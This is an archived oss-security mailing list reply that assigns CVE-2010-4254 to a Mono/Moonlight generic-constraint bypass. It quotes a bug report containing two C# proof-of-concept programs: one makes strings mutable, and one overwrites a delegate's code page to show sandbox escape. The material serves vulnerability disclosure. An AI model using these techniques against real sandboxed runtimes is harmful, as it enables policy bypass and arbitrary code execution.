'Re: [oss-security] CVE request: mono/moonlight: execution of'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    Re: [oss-security] CVE request: mono/moonlight: execution of
From:       Josh Bressers <bressers () redhat ! com>
Date:       2010-11-29 20:36:20
Message-ID: 1544809689.736861291062980367.JavaMail.root () zmail01 ! collab ! prod ! int ! phx2 ! redhat ! com
[Download RAW message or body]

Please use CVE-2010-4254 for this.

Thanks.

-- 
    JB


----- "Thomas Biege" <thomas@suse.de> wrote:

> Hello.
> 
> Just a copy-n-paste from our bugzilla (again):
> 
> ------------------------------------------------------------------------------
> SP 2010-11-24 20:45:21 UTC
> 
> Original (pulled by author) blog entry:
> 
> So I was messing around with generic methods and discovered that
> generic
> constraints can be bypassed on Mono 2.6.7 and 2.8 using reflection
> (with the
> exception of the new() constraint). One of the fun results of this bug
> is that
> the String class can be made mutable without using reflection to set
> private
> members!
> 
> The following code demonstrates this; it is legal and will run on Mono
> up to
> and including version 2.8:
> 
> using System;
> using System.Reflection;
> 
> public class FakeString {
>     public int length;
>     public char start_char;
> }
> 
> public class TestCase {
>     private static FakeString UnsafeConversion<T>(T thing)
>         where T : FakeString
>     {
>         return thing;
>     }
> 
>     public static void Main() {
>         var a = "foo";
>         var b = MakeMutable(a);
> 
>         Console.WriteLine(a);
>         b.start_char = 'b';
>         Console.WriteLine(a);
>     }
> 
>     private static FakeString MakeMutable(string s)
>     {
>         var m = typeof(TestCase).GetMethod("UnsafeConversion",
> BindingFlags.NonPublic | BindingFlags.Static);
>         var m2 = m.MakeGenericMethod(typeof(string));
> 
>         var d = (Func<string,
> FakeString>)Delegate.CreateDelegate(typeof(Func<string, FakeString>),
> null,
> m2);
> 
>         return d(s);
>     }
> }
> 
> 
> 
> Comment 1 SP 2010-11-24 20:54:20 UTC
> 
> This is a follow up of the previous
> https://bugzilla.novell.com/show_bug.cgi?id=654136
> 
> The original blog entry allow trusted (by moonlight) code to mutate
> strings
> which could be used to trick policies (e.g. give a valid URL and, once
> 
> accepted
> as a valid xdomain URL, change it to something else).
> 
> It can also be extended to arbitrary code execution. POC by Geoff
> Norton: 
> 
> using System;
> using System.Reflection;
> using System.Runtime.InteropServices;
> 
> public class DelegateWrapper {
>     public IntPtr method_ptr;
> }
> 
> public delegate void MethodWrapper ();
> 
> public class BreakSandbox {
>     private static DelegateWrapper Convert <T> (T dingus) where T :
> DelegateWrapper {
>         return dingus;
>     }
> 
>     private static DelegateWrapper ConvertDelegate (Delegate del) {
>         var m = typeof (BreakSandbox).GetMethod ("Convert",
> BindingFlags.NonPublic | BindingFlags.Static);
>         var gm = m.MakeGenericMethod (typeof (Delegate));
> 
>         var d = (Func <Delegate, DelegateWrapper>)
> Delegate.CreateDelegate
> (typeof (Func <Delegate, DelegateWrapper>), null, gm);
> 
>         return d (del);
>     }
> 
>     public static void Main (string [] args) {
>         MethodWrapper d = delegate {
>             Console.WriteLine ("Hello");
>         };
> 
>         d ();
>         var converted = ConvertDelegate (d);
>         // Overwrite the already WX page with a 'ret'
>         Marshal.WriteByte (converted.method_ptr, (byte) 0xc3);
>         d ();
>     }
> }
> 
> This code won't execute on Moonlight (since all Marshal.* code is
> SecurityCritical) but it would not be hard to modify the POC to do the
> same
> without SecurityCritical code.
> 
> Note: the bug is present in Mono but does not represent a security
> vulnerability there since Mono (unlike Moonlight) can only execute
> trusted
> code.
> 
> [reply] [-]
> Private
> Comment 2 
> ------------------------------------------------------------------------------
> 
> -- 
>  Thomas Biege <thomas@suse.de>, SUSE LINUX, Security Support &
> Auditing
>  SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg)
> --
>   Wer aufhoert besser werden zu wollen, hoert auf gut zu sein.
>                             -- Marie von Ebner-Eschenbach
[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic